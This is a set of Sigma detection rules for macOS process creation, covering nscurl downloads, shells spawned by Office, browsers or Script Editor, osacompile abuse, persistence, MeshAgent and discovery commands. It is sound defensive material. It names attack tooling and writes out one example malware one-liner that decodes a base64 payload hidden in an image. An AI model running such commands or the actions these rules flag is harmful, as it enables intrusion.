FILE: rules/macos/process_creation/proc_creation_macos_nscurl_usage.yml
================================================
title: File Download Via Nscurl - MacOS
id: 6d8a7cf1-8085-423b-b87d-7e880faabbdf
status: test
description: Detects the execution of the nscurl utility in order to download files.
references:
- https://www.loobins.io/binaries/nscurl/
- https://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl
- https://gist.github.com/nasbench/ca6ef95db04ae04ffd1e0b1ce709cadd
author: Daniel Cortez
date: 2024-06-04
tags:
- attack.defense-evasion
- attack.command-and-control
- attack.t1105
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith: '/nscurl'
CommandLine|contains:
- '--download '
- '--download-directory '
- '--output '
- '-dir '
- '-dl '
- '-ld'
- '-o '
condition: selection
falsepositives:
- Legitimate usage of nscurl by administrators and users.
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_office_susp_child_processes.yml
================================================
title: Suspicious Microsoft Office Child Process - MacOS
id: 69483748-1525-4a6c-95ca-90dc8d431b68
status: test
description: Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution
references:
- https://redcanary.com/blog/applescript/
- https://objective-see.org/blog/blog_0x4B.html
author: Sohan G (D4rkCiph3r)
date: 2023-01-31
modified: 2023-02-04
tags:
- attack.execution
- attack.persistence
- attack.t1059.002
- attack.t1137.002
- attack.t1204.002
logsource:
product: macos
category: process_creation
detection:
selection:
ParentImage|contains:
- 'Microsoft Word'
- 'Microsoft Excel'
- 'Microsoft PowerPoint'
- 'Microsoft OneNote'
Image|endswith:
- '/bash'
- '/curl'
- '/dash'
- '/fish'
- '/osacompile'
- '/osascript'
- '/sh'
- '/zsh'
- '/python'
- '/python3'
- '/wget'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/macos/process_creation/proc_creation_macos_osacompile_runonly_execution.yml
================================================
title: OSACompile Run-Only Execution
id: b9d9b652-d8ed-4697-89a2-a1186ee680ac
status: test
description: Detects potential suspicious run-only executions compiled using OSACompile
references:
- https://redcanary.com/blog/applescript/
- https://ss64.com/osx/osacompile.html
author: Sohan G (D4rkCiph3r)
date: 2023-01-31
tags:
- attack.t1059.002
- attack.execution
logsource:
product: macos
category: process_creation
detection:
selection:
CommandLine|contains|all:
- 'osacompile'
- ' -x '
- ' -e '
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/macos/process_creation/proc_creation_macos_payload_decoded_and_decrypted.yml
================================================
title: Payload Decoded and Decrypted via Built-in Utilities
id: 234dc5df-40b5-49d1-bf53-0d44ce778eca
status: test
description: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.
references:
- https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823
author: Tim Rauch (rule), Elastic (idea)
date: 2022-10-17
tags:
- attack.t1059
- attack.t1204
- attack.execution
- attack.t1140
- attack.defense-evasion
- attack.s0482
- attack.s0402
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith: '/openssl'
CommandLine|contains|all:
- '/Volumes/'
- 'enc'
- '-base64'
- ' -d '
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_persistence_via_plistbuddy.yml
================================================
title: Potential Persistence Via PlistBuddy
id: 65d506d3-fcfe-4071-b4b2-bcefe721bbbb
status: test
description: Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility
references:
- https://redcanary.com/blog/clipping-silver-sparrows-wings/
- https://www.manpagez.com/man/8/PlistBuddy/
author: Sohan G (D4rkCiph3r)
date: 2023-02-18
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1543.001
- attack.t1543.004
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith: '/PlistBuddy'
CommandLine|contains|all:
- 'RunAtLoad'
- 'true'
CommandLine|contains:
- 'LaunchAgents'
- 'LaunchDaemons'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/macos/process_creation/proc_creation_macos_remote_access_tools_meshagent_arguments.yml
================================================
title: Remote Access Tool - Potential MeshAgent Execution - MacOS
id: 22c45af6-f590-4d44-bab3-b5b2d2a2b6d9
related:
- id: 2fbbe9ff-0afc-470b-bdc0-592198339968
type: similar
status: experimental
description: |
Detects potential execution of MeshAgent which is a tool used for remote access.
Historical data shows that threat actors rename MeshAgent binary to evade detection.
Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.
references:
- https://www.huntress.com/blog/know-thy-enemy-a-novel-november-case-on-persistent-remote-access
- https://thecyberexpress.com/ukraine-hit-by-meshagent-malware-campaign/
- https://wazuh.com/blog/how-to-detect-meshagent-with-wazuh/
- https://www.security.com/threat-intelligence/medusa-ransomware-attacks
author: Norbert Jaśniewicz (AlphaSOC)
date: 2025-05-19
tags:
- attack.command-and-control
- attack.t1219.002
logsource:
category: process_creation
product: macos
detection:
selection:
CommandLine|contains: '--meshServiceName'
condition: selection
falsepositives:
- Environments that legitimately use MeshAgent
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_remote_access_tools_renamed_meshagent_execution.yml
================================================
title: Remote Access Tool - Renamed MeshAgent Execution - MacOS
id: bd3b5eaa-439d-4a42-8f35-a49f5c8a2582
related:
- id: b471f462-eb0d-4832-be35-28d94bdb4780
type: similar
- id: 22c45af6-f590-4d44-bab3-b5b2d2a2b6d9
type: derived
status: experimental
description: |
Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent.
RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management.
However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems.
references:
- https://www.huntress.com/blog/know-thy-enemy-a-novel-november-case-on-persistent-remote-access
- https://thecyberexpress.com/ukraine-hit-by-meshagent-malware-campaign/
- https://wazuh.com/blog/how-to-detect-meshagent-with-wazuh/
- https://www.security.com/threat-intelligence/medusa-ransomware-attacks
author: Norbert Jaśniewicz (AlphaSOC)
date: 2025-05-19
tags:
- attack.command-and-control
- attack.defense-evasion
- attack.t1219.002
- attack.t1036.003
logsource:
category: process_creation
product: macos
detection:
selection_meshagent:
- CommandLine|contains: '--meshServiceName'
- OriginalFileName|contains: 'meshagent'
filter_main_legitimate:
Image|endswith:
- '/meshagent'
- '/meshagent_osx64'
condition: selection_meshagent and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
================================================
FILE: rules/macos/process_creation/proc_creation_macos_remote_access_tools_teamviewer_incoming_connection.yml
================================================
title: Remote Access Tool - Team Viewer Session Started On MacOS Host
id: f459ccb4-9805-41ea-b5b2-55e279e2424a
related:
- id: ab70c354-d9ac-4e11-bbb6-ec8e3b153357
type: similar
- id: 1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d
type: similar
status: test
description: |
Detects the command line executed when TeamViewer starts a session started by a remote host.
Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
references:
- Internal Research
author: Josh Nickels, Qi Nan
date: 2024-03-11
tags:
- attack.persistence
- attack.initial-access
- attack.t1133
logsource:
category: process_creation
product: macos
detection:
selection:
ParentImage|endswith: '/TeamViewer_Service'
Image|endswith: '/TeamViewer_Desktop'
CommandLine|endswith: '/TeamViewer_Desktop --IPCport 5939 --Module 1'
condition: selection
falsepositives:
- Legitimate usage of TeamViewer
level: low
================================================
FILE: rules/macos/process_creation/proc_creation_macos_remote_system_discovery.yml
================================================
title: Macos Remote System Discovery
id: 10227522-8429-47e6-a301-f2b2d014e7ad
status: test
description: Detects the enumeration of other remote systems.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md
author: Alejandro Ortuno, oscd.community
date: 2020-10-22
modified: 2021-11-27
tags:
- attack.discovery
- attack.t1018
logsource:
category: process_creation
product: macos
detection:
selection_1:
Image|endswith: '/arp'
CommandLine|contains: '-a'
selection_2:
Image|endswith: '/ping'
CommandLine|contains:
- ' 10.' # 10.0.0.0/8
- ' 192.168.' # 192.168.0.0/16
- ' 172.16.' # 172.16.0.0/12
- ' 172.17.'
- ' 172.18.'
- ' 172.19.'
- ' 172.20.'
- ' 172.21.'
- ' 172.22.'
- ' 172.23.'
- ' 172.24.'
- ' 172.25.'
- ' 172.26.'
- ' 172.27.'
- ' 172.28.'
- ' 172.29.'
- ' 172.30.'
- ' 172.31.'
- ' 127.' # 127.0.0.0/8
- ' 169.254.' # 169.254.0.0/16
condition: 1 of selection*
falsepositives:
- Legitimate administration activities
level: informational
================================================
FILE: rules/macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml
================================================
title: Scheduled Cron Task/Job - MacOs
id: 7c3b43d8-d794-47d2-800a-d277715aa460
status: test
description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md
author: Alejandro Ortuno, oscd.community
date: 2020-10-06
modified: 2022-11-27
tags:
- attack.execution
- attack.persistence
- attack.privilege-escalation
- attack.t1053.003
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith: '/crontab'
CommandLine|contains: '/tmp/'
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_screencapture.yml
================================================
title: Screen Capture - macOS
id: 0877ed01-da46-4c49-8476-d49cdd80dfa7
status: test
description: Detects attempts to use screencapture to collect macOS screenshots
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md
- https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py
author: remotephone, oscd.community
date: 2020-10-13
modified: 2021-11-27
tags:
- attack.collection
- attack.t1113
logsource:
product: macos
category: process_creation
detection:
selection:
Image: '/usr/sbin/screencapture'
condition: selection
falsepositives:
- Legitimate user activity taking screenshots
level: low
================================================
FILE: rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml
================================================
title: Security Software Discovery - MacOs
id: 0ed75b9c-c73b-424d-9e7d-496cd565fbe0
status: test
description: Detects usage of system utilities (only grep for now) to discover security software discovery
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md
author: Daniil Yugoslavskiy, oscd.community
date: 2020-10-19
modified: 2022-11-27
tags:
- attack.discovery
- attack.t1518.001
logsource:
category: process_creation
product: macos
detection:
image:
Image: '/usr/bin/grep'
selection_cli_1:
CommandLine|contains:
- 'nessusd' # nessus vulnerability scanner
- 'santad' # google santa
- 'CbDefense' # carbon black
- 'falcond' # crowdstrike falcon
- 'td-agent' # fluentd log shipper
- 'packetbeat' # elastic network logger/shipper
- 'filebeat' # elastic log file shipper
- 'auditbeat' # elastic auditing agent/log shipper
- 'osqueryd' # facebook osquery
- 'BlockBlock' # Objective-See persistence locations watcher/blocker
- 'LuLu' # Objective-See firewall management utility
selection_cli_2: # Objective Development Software firewall management utility
CommandLine|contains|all:
- 'Little'
- 'Snitch'
condition: image and 1 of selection_cli_*
falsepositives:
- Legitimate activities
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_space_after_filename.yml
================================================
title: Space After Filename - macOS
id: b6e2a2e3-2d30-43b1-a4ea-071e36595690
status: test
description: Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md
author: remotephone
date: 2021-11-20
modified: 2023-01-04
tags:
- attack.defense-evasion
- attack.t1036.006
logsource:
product: macos
category: process_creation
detection:
selection1:
CommandLine|endswith: ' '
selection2:
Image|endswith: ' '
condition: 1 of selection*
falsepositives:
- Mistyped commands or legitimate binaries named to match the pattern
level: low
================================================
FILE: rules/macos/process_creation/proc_creation_macos_split_file_into_pieces.yml
================================================
title: Split A File Into Pieces
id: 7f2bb9d5-6395-4de5-969c-70c11fbe6b12
status: test
description: Detection use of the command "split" to split files into parts and possible transfer.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md
author: 'Igor Fits, Mikhail Larin, oscd.community'
date: 2020-10-15
modified: 2021-11-27
tags:
- attack.exfiltration
- attack.t1030
logsource:
product: macos
category: process_creation
detection:
selection:
Image|endswith: '/split'
condition: selection
falsepositives:
- Legitimate administrative activity
level: low
================================================
FILE: rules/macos/process_creation/proc_creation_macos_susp_browser_child_process.yml
================================================
title: Suspicious Browser Child Process - MacOS
id: 0250638a-2b28-4541-86fc-ea4c558fa0c6
status: test
description: Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.
references:
- https://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang
- https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_initial_access_suspicious_browser_childproc.toml
author: Sohan G (D4rkCiph3r)
date: 2023-04-05
tags:
- attack.initial-access
- attack.execution
- attack.t1189
- attack.t1203
- attack.t1059
logsource:
category: process_creation
product: macos
detection:
selection:
ParentImage|contains:
- 'com.apple.WebKit.WebContent'
- 'firefox'
- 'Google Chrome Helper'
- 'Google Chrome'
- 'Microsoft Edge'
- 'Opera'
- 'Safari'
- 'Tor Browser'
Image|endswith:
- '/bash'
- '/curl'
- '/dash'
- '/ksh'
- '/osascript'
- '/perl'
- '/php'
- '/pwsh'
- '/python'
- '/sh'
- '/tcsh'
- '/wget'
- '/zsh'
filter_main_generic:
CommandLine|contains: '--defaults-torrc' # Informs tor to use default config file
filter_main_ms_autoupdate:
CommandLine|contains: '/Library/Application Support/Microsoft/MAU*/Microsoft AutoUpdate.app/Contents/MacOS/msupdate' # Microsoft AutoUpdate utility
filter_main_chrome:
ParentImage|contains:
- 'Google Chrome Helper'
- 'Google Chrome'
CommandLine|contains:
- '/Volumes/Google Chrome/Google Chrome.app/Contents/Frameworks/*/Resources/install.sh' # Install the Google Chrome browser
- '/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/*/Resources/keystone_promote_preflight.sh' # Updates the Google Chrome branding configuration files
- '/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/*/Resources/keystone_promote_postflight.sh' # Script that performs the post-installation tasks
filter_main_ms_edge:
ParentImage|contains: 'Microsoft Edge'
CommandLine|contains:
- 'IOPlatformExpertDevice' # Retrieves the IOPlatformUUID (parent process - Microsoft Edge)
- 'hw.model' # Retrieves model name of the computer's hardware (parent process - Microsoft Edge)
filter_main_chromerecovery:
ParentImage|contains:
- 'Google Chrome Helper'
- 'Google Chrome'
CommandLine|contains|all:
- '/Users/'
- '/Library/Application Support/Google/Chrome/recovery/'
- '/ChromeRecovery'
filter_optional_null:
# Aoids alerting for the events which do not have command-line arguments
CommandLine: null
filter_optional_empty:
# Aoids alerting for the events which do not have command-line arguments
CommandLine: ''
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Legitimate browser install, update and recovery scripts
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml
================================================
title: Suspicious Execution via macOS Script Editor
id: 6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4
status: test
description: Detects when the macOS Script Editor utility spawns an unusual child process.
author: Tim Rauch (rule), Elastic (idea)
references:
- https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685
- https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/
date: 2022-10-21
modified: 2022-12-28
logsource:
category: process_creation
product: macos
tags:
- attack.t1566
- attack.t1566.002
- attack.initial-access
- attack.t1059
- attack.t1059.002
- attack.t1204
- attack.t1204.001
- attack.execution
- attack.persistence
- attack.t1553
- attack.defense-evasion
detection:
selection_parent:
ParentImage|endswith: '/Script Editor'
selection_img:
- Image|endswith:
- '/curl'
- '/bash'
- '/sh'
- '/zsh'
- '/dash'
- '/fish'
- '/osascript'
- '/mktemp'
- '/chmod'
- '/php'
- '/nohup'
- '/openssl'
- '/plutil'
- '/PlistBuddy'
- '/xattr'
- '/sqlite'
- '/funzip'
- '/popen'
- Image|contains:
- 'python'
- 'perl'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml
================================================
title: Potential Discovery Activity Using Find - MacOS
id: 85de3a19-b675-4a51-bfc6-b11a5186c971
related:
- id: 8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf
type: similar
status: test
description: Detects usage of "find" binary in a suspicious manner to perform discovery
references:
- https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-28
tags:
- attack.discovery
- attack.t1083
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith: '/find'
CommandLine|contains:
- '-perm -4000'
- '-perm -2000'
- '-perm 0777'
- '-perm -222'
- '-perm -o w'
- '-perm -o x'
- '-perm -u=s'
- '-perm -g=s'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_susp_histfile_operations.yml
================================================
title: Suspicious History File Operations
id: 508a9374-ad52-4789-b568-fc358def2c65
status: test
description: Detects commandline operations on shell history files
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
author: 'Mikhail Larin, oscd.community'
date: 2020-10-17
modified: 2021-11-27
tags:
- attack.credential-access
- attack.t1552.003
logsource:
product: macos
category: process_creation
detection:
selection:
CommandLine|contains:
- '.bash_history'
- '.zsh_history'
- '.zhistory'
- '.history'
- '.sh_history'
- 'fish_history'
condition: selection
falsepositives:
- Legitimate administrative activity
- Legitimate software, cleaning hist file
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_susp_in_memory_download_and_compile.yml
================================================
title: Potential In-Memory Download And Compile Of Payloads
id: 13db8d2e-7723-4c2c-93c1-a4d36994f7ef
status: test
description: Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware
references:
- https://redcanary.com/blog/mac-application-bundles/
author: Sohan G (D4rkCiph3r), Red Canary (idea)
date: 2023-08-22
tags:
- attack.command-and-control
- attack.execution
- attack.t1059.007
- attack.t1105
logsource:
category: process_creation
product: macos
detection:
selection:
CommandLine|contains|all:
- 'osacompile'
- 'curl'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml
================================================
title: Suspicious MacOS Firmware Activity
id: 7ed2c9f7-c59d-4c82-a7e2-f859aa676099
status: test
description: Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.
references:
- https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml
- https://www.manpagez.com/man/8/firmwarepasswd/
- https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web
author: Austin Songer @austinsonger
date: 2021-09-30
modified: 2022-10-09
tags:
- attack.impact
logsource:
category: process_creation
product: macos
detection:
selection1:
Image: '/usr/sbin/firmwarepasswd'
CommandLine|contains:
- 'setpasswd'
- 'full'
- 'delete'
- 'check'
condition: selection1
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_susp_system_network_discovery.yml
================================================
title: System Network Discovery - macOS
id: 58800443-f9fc-4d55-ae0c-98a3966dfb97
status: test
description: Detects enumeration of local network configuration
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md
author: remotephone, oscd.community
date: 2020-10-06
modified: 2024-08-29
tags:
- attack.discovery
- attack.t1016
logsource:
product: macos
category: process_creation
detection:
selection_1:
Image|endswith:
- '/arp'
- '/ifconfig'
- '/netstat'
- '/networksetup'
- '/socketfilterfw'
selection_2:
Image: '/usr/bin/defaults'
CommandLine|contains|all:
- '/Library/Preferences/com.apple.alf'
- 'read'
filter_main_wifivelocityd:
ParentImage|endswith: '/wifivelocityd'
condition: 1 of selection_* and not 1 of filter_main_*
falsepositives:
- Legitimate administration activities
level: informational
================================================
FILE: rules/macos/process_creation/proc_creation_macos_suspicious_applet_behaviour.yml
================================================
title: Osacompile Execution By Potentially Suspicious Applet/Osascript
id: a753a6af-3126-426d-8bd0-26ebbcb92254
status: test
description: Detects potential suspicious applet or osascript executing "osacompile".
references:
- https://redcanary.com/blog/mac-application-bundles/
author: Sohan G (D4rkCiph3r), Red Canary (Idea)
date: 2023-04-03
tags:
- attack.execution
- attack.t1059.002
logsource:
category: process_creation
product: macos
detection:
selection:
ParentImage|endswith:
- '/applet'
- '/osascript'
CommandLine|contains: 'osacompile'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_swvers_discovery.yml
================================================
title: System Information Discovery Using sw_vers
id: 5de06a6f-673a-4fc0-8d48-bcfe3837b033
status: test
description: Detects the use of "sw_vers" for system information discovery
references:
- https://www.virustotal.com/gui/file/d3fa64f63563fe958b75238742d1e473800cb5f49f5cb79d38d4aa3c93709026/behavior
- https://www.virustotal.com/gui/file/03b71eaceadea05bc0eea5cddecaa05f245126d6b16cfcd0f3ba0442ac58dab3/behavior
- https://ss64.com/osx/sw_vers.html
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-12-20
tags:
- attack.discovery
- attack.t1082
logsource:
product: macos
category: process_creation
detection:
# VT Query: 'behavior_processes:"sw_vers" and (behavior_processes:"-productVersion" or behavior_processes:"-productName" or behavior_processes:"-buildVersion") tag:dmg p:5+'
selection_image:
Image|endswith: '/sw_vers'
selection_options:
CommandLine|contains:
- '-buildVersion'
- '-productName'
- '-productVersion'
condition: all of selection_*
falsepositives:
- Legitimate administrative activities
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml
================================================
title: User Added To Admin Group Via Sysadminctl
id: 652c098d-dc11-4ba6-8566-c20e89042f2b
related:
- id: 0c1ffcf9-efa9-436e-ab68-23a9496ebf5b
type: obsolete
status: test
description: Detects attempts to create and add an account to the admin group via "sysadminctl"
references:
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos
- https://ss64.com/osx/sysadminctl.html
author: Sohan G (D4rkCiph3r)
date: 2023-03-19
tags:
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.privilege-escalation
- attack.t1078.003
logsource:
category: process_creation
product: macos
detection:
selection:
# Creates and adds new user to admin group
Image|endswith: '/sysadminctl'
CommandLine|contains|all:
- ' -addUser '
- ' -admin '
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml
================================================
title: Guest Account Enabled Via Sysadminctl
id: d7329412-13bd-44ba-a072-3387f804a106
status: test
description: Detects attempts to enable the guest account using the sysadminctl utility
references:
- https://ss64.com/osx/sysadminctl.html
author: Sohan G (D4rkCiph3r)
date: 2023-02-18
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.t1078
- attack.t1078.001
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith: '/sysadminctl'
CommandLine|contains|all:
# By default the guest account is not active
- ' -guestAccount'
- ' on'
condition: selection
falsepositives:
- Unknown
level: low
================================================
FILE: rules/macos/process_creation/proc_creation_macos_sysctl_discovery.yml
================================================
title: System Information Discovery Via Sysctl - MacOS
id: 6ff08e55-ea53-4f27-94a1-eff92e6d9d5c
status: test
description: |
Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information.
This process is primarily used to detect and avoid virtualization and analysis environments.
references:
- https://www.loobins.io/binaries/sysctl/#
- https://evasions.checkpoint.com/techniques/macos.html
- https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/
- https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- https://objective-see.org/blog/blog_0x1E.html
- https://www.virustotal.com/gui/file/1c547a064494a35d6b5e6b459de183ab2720a22725e082bed6f6629211f7abc1/behavior
- https://www.virustotal.com/gui/file/b4b1fc65f87b3dcfa35e2dbe8e0a34ad9d8a400bec332025c0a2e200671038aa/behavior
author: Pratinav Chandra
date: 2024-05-27
tags:
- attack.defense-evasion
- attack.t1497.001
- attack.discovery
- attack.t1082
logsource:
product: macos
category: process_creation
detection:
selection_img:
- Image|endswith: '/sysctl'
- CommandLine|contains: 'sysctl'
selection_cmd:
CommandLine|contains:
- 'hw.'
- 'kern.'
- 'machdep.'
condition: all of selection_*
falsepositives:
- Legitimate administrative activities
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml
================================================
title: System Network Connections Discovery - MacOs
id: 9a7a0393-2144-4626-9bf1-7c2f5a7321db
status: test
description: Detects usage of system utilities to discover system network connections
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md
author: Daniil Yugoslavskiy, oscd.community
date: 2020-10-19
modified: 2022-12-28
tags:
- attack.discovery
- attack.t1049
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith:
- '/who'
- '/w'
- '/last'
- '/lsof'
- '/netstat'
condition: selection
falsepositives:
- Legitimate activities
level: informational
================================================
FILE: rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml
================================================
title: System Information Discovery Using System_Profiler
id: 4809c683-059b-4935-879d-36835986f8cf
status: test
description: |
Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information.
This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.
references:
- https://www.trendmicro.com/en_za/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html
- https://www.sentinelone.com/wp-content/uploads/pdf-gen/1630910064/20-common-tools-techniques-used-by-macos-threat-actors-malware.pdf
- https://ss64.com/mac/system_profiler.html
- https://objective-see.org/blog/blog_0x62.html
- https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/
- https://gist.github.com/nasbench/9a1ba4bc7094ea1b47bc42bf172961af
author: Stephen Lincoln `@slincoln_aiq` (AttackIQ)
date: 2024-01-02
tags:
- attack.discovery
- attack.defense-evasion
- attack.t1082
- attack.t1497.001
logsource:
product: macos
category: process_creation
detection:
selection_img:
- Image|endswith: '/system_profiler'
- CommandLine|contains: 'system_profiler'
selection_cmd:
# Note: This list is based on CTI reporting. Threat actors might use other data types. Please refere to https://gist.github.com/nasbench/9a1ba4bc7094ea1b47bc42bf172961af for a full list
CommandLine|contains:
- 'SPApplicationsDataType'
- 'SPHardwareDataType'
- 'SPNetworkDataType'
- 'SPUSBDataType'
condition: all of selection_*
falsepositives:
- Legitimate administrative activities
level: medium
================================================
FILE: rules/macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml
================================================
title: System Shutdown/Reboot - MacOs
id: 40b1fbe2-18ea-4ee7-be47-0294285811de
status: test
description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md
author: 'Igor Fits, Mikhail Larin, oscd.community'
date: 2020-10-19
modified: 2022-11-26
tags:
- attack.impact
- attack.t1529
logsource:
product: macos
category: process_creation
detection:
selection:
Image|endswith:
- '/shutdown'
- '/reboot'
- '/halt'
condition: selection
falsepositives:
- Legitimate administrative activity
level: informational
================================================
FILE: rules/macos/process_creation/proc_creation_macos_tail_base64_decode_from_image.yml
================================================
title: Potential Base64 Decoded From Images
id: 09a910bf-f71f-4737-9c40-88880ba5913d
status: test
description: |
Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.
references:
- https://www.virustotal.com/gui/file/16bafdf741e7a13137c489f3c8db1334f171c7cb13b62617d691b0a64783cc48/behavior
- https://www.virustotal.com/gui/file/483fafc64a2b84197e1ef6a3f51e443f84dc5742602e08b9e8ec6ad690b34ed0/behavior
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-12-20
tags:
- attack.defense-evasion
- attack.t1140
logsource:
product: macos
category: process_creation
detection:
# Example: /bin/bash sh -c tail -c +21453 '/Volumes/Installer/Installer.app/Contents/Resources/workout-logo.jpeg' | base64 --decode > /tmp/54A0A2CD-FAD1-4D4D-AAF5-5266F6344ABE.zip
# VT Query: 'behavior_processes:"tail" (behavior_processes:"jpeg" or behavior_processes:"jpg" or behavior_processes:"png" or behavior_processes:"gif") behavior_processes:"base64" behavior_processes:"--decode >" and tag:dmg'
selection_image:
Image|endswith: '/bash'
